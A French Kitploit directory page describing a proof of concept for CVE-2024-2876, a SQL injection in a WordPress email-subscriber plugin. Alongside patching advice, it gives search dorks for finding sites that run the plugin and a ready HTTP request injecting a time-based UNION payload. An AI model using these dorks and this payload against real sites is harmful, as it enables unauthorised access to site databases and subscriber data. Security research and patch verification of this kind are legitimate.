Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-2876 — Preuve de concept d'exploitation pour CVE-2024-2876, une injection SQL critique dans le plugin WordPress Email Subscribers by Icegram Express, permettant à des attaquants non authentifiés d'exécuter des requêtes SQL arbitraires. | Kitploit
Outils/GitHubGitHub/aerchy/cve-2024-2876
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubaerchy/cve-2024-2876

CVE-2024-2876

Preuve de concept d'exploitation pour CVE-2024-2876, une injection SQL critique dans le plugin WordPress Email Subscribers by Icegram Express, permettant à des attaquants non authentifiés d'exécuter des requêtes SQL arbitraires.

Voir le dépôt
2il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-2876 - Vulnérabilité d'injection SQL dans Email Subscribers by Icegram Express

Aperçu

CVE-2024-2876 est une vulnérabilité de sécurité critique découverte dans le plugin "Email Subscribers by Icegram Express" pour WordPress. Cette vulnérabilité affecte les versions jusqu'à la 5.7.14 incluse et présente des risques importants pour plus de 90 000 sites web.

Détails de la vulnérabilité

  • ID CVE : CVE-2024-2876
  • Score CVSS : 9,8 (Critique)
  • Versions affectées : Jusqu'à la 5.7.14
  • Version corrigée : 5.7.15 et ultérieures

Description

La vulnérabilité est une faille d'injection SQL qui permet à des attaquants non authentifiés d'exécuter des requêtes SQL malveillantes sur les bases de données WordPress affectées. En manipulant les entrées utilisateur qui ne sont pas correctement assainies, les attaquants peuvent extraire des informations sensibles telles que les noms d'utilisateur, les adresses e-mail, les hachages de mots de passe et les listes d'abonnés.

Mécanisme d'exploitation

L'injection SQL se produit dans la fonction run de la classe du plugin, où une validation insuffisante des entrées conduit à l'exécution non autorisée de code SQL. Cela compromet l'intégrité et la confidentialité des données stockées dans la base de données WordPress.

IG_ES_Subscribers_Query

Dorks CVE-2024-2876

  • FOFA : body="/wp-content/plugins/email-subscribers/"

  • publicwww : "/wp-content/plugins/email-subscribers/"

POC CVE-2024-2876

root@kitploit:~
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111

Recommandations

  1. Mise à jour immédiate : Si vous utilisez le plugin "Email Subscribers by Icegram Express", mettez-le à niveau vers la version 5.7.15 ou une version ultérieure immédiatement pour appliquer le correctif de sécurité.

  2. Audits réguliers : Examinez et mettez à jour régulièrement tous les plugins et thèmes WordPress vers leurs dernières versions pour garantir la sécurité.

  3. Plugins de sécurité : Utilisez des plugins de sécurité WordPress réputés pour renforcer les défenses contre l'injection SQL et d'autres menaces cybernétiques.

  4. Politiques de mots de passe robustes : Mettez en œuvre des mots de passe forts et uniques pour tous les comptes liés à votre site WordPress afin de réduire les risques d'accès non autorisé.

Impact de la non-conformité

Le fait de ne pas mettre à jour le plugin affecté peut laisser les sites web vulnérables aux violations de données et aux accès non autorisés. Compte tenu de l'utilisation répandue de ce plugin, une action immédiate est cruciale pour sécuriser les installations.

Télécharger l’outil